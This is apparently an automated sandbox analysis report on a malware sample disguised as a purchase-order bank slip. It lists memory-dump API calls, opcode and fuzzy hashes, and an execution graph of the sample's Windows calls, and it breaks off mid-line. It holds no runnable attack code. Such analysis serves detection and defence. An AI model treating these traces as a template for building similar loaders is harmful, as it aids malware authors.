                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 787dcc4abee7dadc1ebb4ea254c6b5cf75b4c2775cf831dc70b43af22d334c4c
                                                                                                        • Instruction ID: 73b841ab666d7908b011c40a7810a40d732aae978e95e7c43ddeae795db8309d
                                                                                                        • Opcode Fuzzy Hash: 787dcc4abee7dadc1ebb4ea254c6b5cf75b4c2775cf831dc70b43af22d334c4c
                                                                                                        • Instruction Fuzzy Hash: E61158B59002498FDB20DFAAC4457EEFBF9EF88324F24841AD419A7240CB75A941CBA5
                                                                                                        APIs
                                                                                                        • ResumeThread.KERNELBASE(73013C05), ref: 0766EED2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 584cd34605a10c5c552fe86db8508baf9335423bbac59839af20bb5473f2c4ce
                                                                                                        • Instruction ID: fcc21e0ed2295ff28573f9ea534bc9c587e543a449114b945c494412856f0fab
                                                                                                        • Opcode Fuzzy Hash: 584cd34605a10c5c552fe86db8508baf9335423bbac59839af20bb5473f2c4ce
                                                                                                        • Instruction Fuzzy Hash: EC113AB5D002498FDB10DFAAC4457AEFBF9EF88324F14841AD419A7240CB75A944CB95
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7AFBE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: a7dc3f43b181fac0ba2a208402d40c8e45c2ba822540f82020b5131fd4719182
                                                                                                        • Instruction ID: e4606cd084b75dd2c30e55969fa56700a9f7e22154012176e4ef7c3325a182bc
                                                                                                        • Opcode Fuzzy Hash: a7dc3f43b181fac0ba2a208402d40c8e45c2ba822540f82020b5131fd4719182
                                                                                                        • Instruction Fuzzy Hash: 6C1122B6C00249CFCB10CF9AD444ADEFBF4EF88324F15846AD528A7600C379A545CFA1
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 07B3121D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1784215164.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7b30000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: e62351d657c0618a5a5059682ba19a44f1d6d7e4a67498a3f126d24051c1100b
                                                                                                        • Instruction ID: 3719c9eb359c9631c05e97b71fcd5456ad6210abbf6bf89d17f53647db3e1cdd
                                                                                                        • Opcode Fuzzy Hash: e62351d657c0618a5a5059682ba19a44f1d6d7e4a67498a3f126d24051c1100b
                                                                                                        • Instruction Fuzzy Hash: AF1103B580024DDFDB10DF9AD845BDEFBF8EB48320F24845AE518A7640C375A984CFA1
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 07B3121D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1784215164.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7b30000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: 80a9755804b8635384621900a8b1bdd2295fb9ce73a68bd17bd2425bfbceb792
                                                                                                        • Instruction ID: 6d1732d800699b9cd4f7f9966031b52bbb3368893297ec41e77f1e63977bf36f
                                                                                                        • Opcode Fuzzy Hash: 80a9755804b8635384621900a8b1bdd2295fb9ce73a68bd17bd2425bfbceb792
                                                                                                        • Instruction Fuzzy Hash: 1511E5B5800749DFDB10DF9AD845BDEFBF8EB48320F148459E518A7240C375A544CFA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769043550.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_152d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 477e0bb0e63228eb73e91b195fef47bbd8b2160a481d040709b988268fcd81a1
                                                                                                        • Instruction ID: bce6abf57ee2dfb98855aeab011e88e27a66c6e15755fae689513812fcf3b677
                                                                                                        • Opcode Fuzzy Hash: 477e0bb0e63228eb73e91b195fef47bbd8b2160a481d040709b988268fcd81a1
                                                                                                        • Instruction Fuzzy Hash: AD2136B2504200DFDB05DF48C9C0B5ABFB5FB98314F24C569E9090F286C376E446C6E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769098529.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_153d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d05a7dddb3a1b7b94fc1ea4d982ae9a76ef1baa565e0350417f53b68bf28ec94
                                                                                                        • Instruction ID: 3a25e4ab4d88dbe575efb2a96dc262786710f81c4250c624af2739ccd5fa1daa
                                                                                                        • Opcode Fuzzy Hash: d05a7dddb3a1b7b94fc1ea4d982ae9a76ef1baa565e0350417f53b68bf28ec94
                                                                                                        • Instruction Fuzzy Hash: EF21F571504200DFDB06DF98D5C0B26BBB5FBC8324F64C96DE9494F252C73AD406CA61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769098529.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_153d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8cb590323ebad35fd1127ab3d06eb50a7fd5b1e7de7219863705b38c2d635077
                                                                                                        • Instruction ID: 63d7563bc82e816f49c67dff5277b3857d10fcc8b6a5aa536119d08c6149041a
                                                                                                        • Opcode Fuzzy Hash: 8cb590323ebad35fd1127ab3d06eb50a7fd5b1e7de7219863705b38c2d635077
                                                                                                        • Instruction Fuzzy Hash: AA2103B1504200DFDB15DF98D480B26FBB5FB88B14F64C96DE9494F246D33AD407CA61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769098529.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_153d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 19a64f721eb0fde0503a95896fb86b0b9a3ba01d20ade31037bca889b22ca1e1
                                                                                                        • Instruction ID: 252735a631c16c85ad5276a9e0c7f2d3349a06377184b507aaddbe32a465ee3d
                                                                                                        • Opcode Fuzzy Hash: 19a64f721eb0fde0503a95896fb86b0b9a3ba01d20ade31037bca889b22ca1e1
                                                                                                        • Instruction Fuzzy Hash: 19217F755093808FDB12CF64D990B15BF71FB86214F28C5DAD8498F2A7C33A980ACB62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769043550.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_152d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                        • Instruction ID: 3977aa4eaa39ff36918d73b100e90d6b51b70afb856bd913c9243fea46fddf86
                                                                                                        • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                        • Instruction Fuzzy Hash: A211DF72404280CFDB12CF44D9C0B5ABF71FB84324F24C2A9D9094F256C33AE45ACBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769098529.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_153d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                        • Instruction ID: cf1cd5722b425cef9aa569823c019647f7ee3c57e8051b1a1a8b352e9d5244e4
                                                                                                        • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                        • Instruction Fuzzy Hash: E311BB75504280DFDB12CF54C5C0B19BBB1FB84224F24C6A9E8494F296C33AD40ACB61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769043550.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_152d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 778d42d26ea043926f31a7e440c5c134722fb32cf01bfd598b6e8317f216655e
                                                                                                        • Instruction ID: 03d2e210925b51e5c0a10abbc0c61d5dda9fc47af2cde75a9f0ff21353ce380d
                                                                                                        • Opcode Fuzzy Hash: 778d42d26ea043926f31a7e440c5c134722fb32cf01bfd598b6e8317f216655e
                                                                                                        • Instruction Fuzzy Hash: 7B0184730043949AE7219A5ACC84B66FFF8EF46760F1C895AED094E2C6D77D9840CA71
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769043550.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_152d000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a7b391fae0af2415fbfdb8d150be88f21fb7d8dff8d44ff88c4feec17b79d0fb
                                                                                                        • Instruction ID: 9cfddd88ddbe402d9122ad2326a348a8b11d0261665a4d5d863fc30c9799f7bb
                                                                                                        • Opcode Fuzzy Hash: a7b391fae0af2415fbfdb8d150be88f21fb7d8dff8d44ff88c4feec17b79d0fb
                                                                                                        • Instruction Fuzzy Hash: E8F06273404394AEE7218A1ADC84B66FFA8EF52774F18C55AED084F2C7C3799844CAB1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TJyq$Tetq$xbwq
                                                                                                        • API String ID: 0-1363049387
                                                                                                        • Opcode ID: 4cc74d2f24a3e70600e4e6fe313a7fce0b0e1746ed303b8e6bde2648fb1943ab
                                                                                                        • Instruction ID: fa3296dbe18ad67ca82d6fa06bc8a56ee10ef0a55f37b3a7d8b87d9c371e3894
                                                                                                        • Opcode Fuzzy Hash: 4cc74d2f24a3e70600e4e6fe313a7fce0b0e1746ed303b8e6bde2648fb1943ab
                                                                                                        • Instruction Fuzzy Hash: BCC1BFB5E046688FDB19CF6AC9446DDBBF2AF89300F14C0EAD409AB364DA345E85CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1784215164.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7b30000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ce412fefd923508ecc3f9663b7d93a62cba6faaeaef952d8471566af2adc41ce
                                                                                                        • Instruction ID: 0979204647a71862cb91c507330effbf6a5980bd5eec707d2663c5710bc2fe73
                                                                                                        • Opcode Fuzzy Hash: ce412fefd923508ecc3f9663b7d93a62cba6faaeaef952d8471566af2adc41ce
                                                                                                        • Instruction Fuzzy Hash: 17029BF1A016199FEB19DFB9C8507AEBBF6FF89300F1044AAD1059B290DB34D986CB51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 06484873607dcb93a1078dcb5a329e3c40464d8b782a04443e408fa37fac1b5d
                                                                                                        • Instruction ID: fc304864663946f87f9a234612c6e375ffc6e571a0c1304ecb3dc59d1393f95e
                                                                                                        • Opcode Fuzzy Hash: 06484873607dcb93a1078dcb5a329e3c40464d8b782a04443e408fa37fac1b5d
                                                                                                        • Instruction Fuzzy Hash: F8E115B4E005198FCB14DFA9C5849AEBBB2FF89304F24C169D459AB355D730AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ae4bc11ba674fea16c8898bad15b6c5f71537a0b283fb5244f8dca9ccb54ed5a
                                                                                                        • Instruction ID: e1b720354b6d6b70d7f391187262c7539cf4cf9b9d4b4d3872b8d72d4c7f0463
                                                                                                        • Opcode Fuzzy Hash: ae4bc11ba674fea16c8898bad15b6c5f71537a0b283fb5244f8dca9ccb54ed5a
                                                                                                        • Instruction Fuzzy Hash: B7E118B8E001598FCB14DFA9C5849AEFBB2FF89304F248169D415AB355D731AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 47ca24a3daf242a957a2804e6c71b2e0aca4141ca7b22f08af8f221ab7fda496
                                                                                                        • Instruction ID: dbc778d5573751f4b0db353fbc8766dfc4657eec87cb691646427d064cd58f4d
                                                                                                        • Opcode Fuzzy Hash: 47ca24a3daf242a957a2804e6c71b2e0aca4141ca7b22f08af8f221ab7fda496
                                                                                                        • Instruction Fuzzy Hash: 5DE117B8E101598FCB14DFA9C5849AEFBB2FF89301F248169D415AB355D731AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8af5dd0e4f6c497250864e3b85b82d26207483ed3346bf75672af7c09c652166
                                                                                                        • Instruction ID: f9ed0d589cc5cc1228d05c9de4f432a6c6c5c31bdfa2e06a8e1318eede2eb8f4
                                                                                                        • Opcode Fuzzy Hash: 8af5dd0e4f6c497250864e3b85b82d26207483ed3346bf75672af7c09c652166
                                                                                                        • Instruction Fuzzy Hash: 54E117B4E005598FCB14DFA9C5849AEBBB2FF89304F24C169D455AB355D730AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 006a00a1cbbd1db06e8255acc15dc334926784e3d7b864976265661359a63732
                                                                                                        • Instruction ID: 1ed342b2012f58493cb866f797ac3a1eb27d0a6a0bbe576657cc0dfb6362e71d
                                                                                                        • Opcode Fuzzy Hash: 006a00a1cbbd1db06e8255acc15dc334926784e3d7b864976265661359a63732
                                                                                                        • Instruction Fuzzy Hash: 49E118B4E005599FCB14DFA9C5849AEFBB2FF89304F248169D459AB355C730AD82CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 24a03414ae77949d0843e7e1d63fee0be1c4c4db783557a4a1b1a7db12371806
                                                                                                        • Instruction ID: afceeaaad900cd6c3fb5ad0d8e3e3f3b60de66249b8ff85ab84153d50cc1a352
                                                                                                        • Opcode Fuzzy Hash: 24a03414ae77949d0843e7e1d63fee0be1c4c4db783557a4a1b1a7db12371806
                                                                                                        • Instruction Fuzzy Hash: 00D10AB5D09259CFDB14CFA5C8887DEBBF2FB8A304F4091A9D40AA7240DB745A86CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 78242a90bb4b1d8aea78fb6beefe6d2be94c93d499087f355877a3c5ef8d9835
                                                                                                        • Instruction ID: d8e8bef7f8bf24f0966d2aea2e2befc2850a5ea2fe543ae5948e16c3983e9f0a
                                                                                                        • Opcode Fuzzy Hash: 78242a90bb4b1d8aea78fb6beefe6d2be94c93d499087f355877a3c5ef8d9835
                                                                                                        • Instruction Fuzzy Hash: 5BD11B31C2075A8ACB50EBA5D99069DB7B1FF99300F20CB9AE4097B250FB746AD4CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 06c1d7726726b466a45ec1ec18fdc4a13040ccc471ff9355729f8138ee4e81f9
                                                                                                        • Instruction ID: 795f1784e6d3341a0b8058060c5296f7d31688e136f9cac4f2a36b3f7ce994f9
                                                                                                        • Opcode Fuzzy Hash: 06c1d7726726b466a45ec1ec18fdc4a13040ccc471ff9355729f8138ee4e81f9
                                                                                                        • Instruction Fuzzy Hash: 7FA17D36E00209CFCF15DFB4D84099EBBB2FF85740B15866AEA01AB265DB71E916CF40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f0a0a220bc8e2fda0015026fd2ddd8eecfe1776445521b417a340306eed588ca
                                                                                                        • Instruction ID: 20fb26eb7ba4e25e8d04befa52347342d920bb90616662b42aa413f9ff6f8f65
                                                                                                        • Opcode Fuzzy Hash: f0a0a220bc8e2fda0015026fd2ddd8eecfe1776445521b417a340306eed588ca
                                                                                                        • Instruction Fuzzy Hash: 14D1FB3182075A8ACB50EB65D950A99B7B1FF99300F10CB9AE4097B250FF746AD4CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fdbbea84039064f1363b4ab8aa9700ec000fb494fe69e667fd5f8725bf07fa28
                                                                                                        • Instruction ID: 6534f1cb189e4f5e19b4d0467f11edc3a7e9c5402a8d3b659f77bd3e54f12600
                                                                                                        • Opcode Fuzzy Hash: fdbbea84039064f1363b4ab8aa9700ec000fb494fe69e667fd5f8725bf07fa28
                                                                                                        • Instruction Fuzzy Hash: CC514CB4E046198FCB14CFA9C9445AEFBB2BF89300F14C16AD459AB756D730A942CFA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0810b5fcf5ebb47c7b365ef1bad1b5aefc39bb476d8c9fcd86d8c649d66265d2
                                                                                                        • Instruction ID: 98d601421bd49f68c3221be1a6e35607b1aba7813182c49875dbb4f49ad6cad8
                                                                                                        • Opcode Fuzzy Hash: 0810b5fcf5ebb47c7b365ef1bad1b5aefc39bb476d8c9fcd86d8c649d66265d2
                                                                                                        • Instruction Fuzzy Hash: 7B512CB4E106198FCB14CFA9C9445AEFBB2FF89304F24C169D458AB355D730AA41CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d9329be42c98492b973d40c6ed04eb429841c3baaef1e745333f7421e6b7623e
                                                                                                        • Instruction ID: b5741a098235805c32f66c0de150f0c175c0fd88a9d6b1ab944f58f734e1fa6f
                                                                                                        • Opcode Fuzzy Hash: d9329be42c98492b973d40c6ed04eb429841c3baaef1e745333f7421e6b7623e
                                                                                                        • Instruction Fuzzy Hash: 83512AB4E106198FDB14CFA9C9845AEFBB2BF89300F24C169D419A7355D730AE42CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 32d480fe9801d7e13cf57be683404da4d2de08cbea38c28c5d5799a60e6738f0
                                                                                                        • Instruction ID: 443c5589f30e153d25e9083991006825aaacd8dd27ac30239d7c1ad4a974a2d6
                                                                                                        • Opcode Fuzzy Hash: 32d480fe9801d7e13cf57be683404da4d2de08cbea38c28c5d5799a60e6738f0
                                                                                                        • Instruction Fuzzy Hash: AA51FCB8E102198FDB14CFA9C9845AEFBB2FF89305F24C169D419A7355D7319A42CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e11b24b04deb8d5fee2769a44d602cc236b3a11992e5fe80261b363260d744a9
                                                                                                        • Instruction ID: 9f95fbd88d83d357992d30098e4ae6f3c60800a51eee843a8dce6e6cb676211f
                                                                                                        • Opcode Fuzzy Hash: e11b24b04deb8d5fee2769a44d602cc236b3a11992e5fe80261b363260d744a9
                                                                                                        • Instruction Fuzzy Hash: DE5109B4E102198FDB14CFA9C9845AEFBB2BF89304F24C169D419AB356D7319942CFA0

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.2%
                                                                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                                                                        Signature Coverage:8%
                                                                                                        Total number of Nodes:137
                                                                                                        Total number of Limit Nodes:11
                                                                                                        execution_graph 94048 42ba43 94049 42ba5d 94048->94049 94052 17d2df0 LdrInitializeThunk 94049->94052 94050 42ba85 94052->94050 94053 424b63 94058 424b7c 94053->94058 94054 424c0c 94055 424bc4 94061 42e573 94055->94061 94058->94054 94058->94055 94059 424c07 94058->94059 94060 42e573 RtlFreeHeap 94059->94060 94060->94054 94064 42c7b3 94061->94064 94063 424bd4 94065 42c7cd 94064->94065 94066 42c7de RtlFreeHeap 94065->94066 94066->94063 94157 42f613 94158 42f623 94157->94158 94159 42f629 94157->94159 94162 42e653 94159->94162 94161 42f64f 94165 42c763 94162->94165 94164 42e66e 94164->94161 94166 42c780 94165->94166 94167 42c791 RtlAllocateHeap 94166->94167 94167->94164 94168 4247d3 94169 4247ef 94168->94169 94170 424817 94169->94170 94171 42482b 94169->94171 94173 42c433 NtClose 94170->94173 94172 42c433 NtClose 94171->94172 94174 424834 94172->94174 94175 424820 94173->94175 94178 42e693 RtlAllocateHeap 94174->94178 94177 42483f 94178->94177 94179 413e13 94180 413e2d 94179->94180 94185 417563 94180->94185 94182 413e4b 94183 413e90 94182->94183 94184 413e7f PostThreadMessageW 94182->94184 94184->94183 94186 417587 94185->94186 94187 41758e 94186->94187 94188 4175d1 LdrLoadDll 94186->94188 94187->94182 94188->94187 94189 418bd3 94190 418c03 94189->94190 94192 418c2f 94190->94192 94193 41b083 94190->94193 94194 41b0c7 94193->94194 94195 41b0e8 94194->94195 94196 42c433 NtClose 94194->94196 94195->94190 94196->94195 94197 41e293 94198 41e2b9 94197->94198 94201 41e3b6 94198->94201 94203 42f743 94198->94203 94200 41e354 94200->94201 94202 42ba93 LdrInitializeThunk 94200->94202 94202->94201 94204 42f6b3 94203->94204 94205 42e653 RtlAllocateHeap 94204->94205 94206 42f710 94204->94206 94207 42f6ed 94205->94207 94206->94200 94208 42e573 RtlFreeHeap 94207->94208 94208->94206 94209 4138b3 94210 4138d5 94209->94210 94212 42c6c3 94209->94212 94213 42c6e0 94212->94213 94216 17d2c70 LdrInitializeThunk 94213->94216 94214 42c708 94214->94210 94216->94214 94067 401b07 94069 401aa2 94067->94069 94068 401a48 94069->94068 94072 42fae3 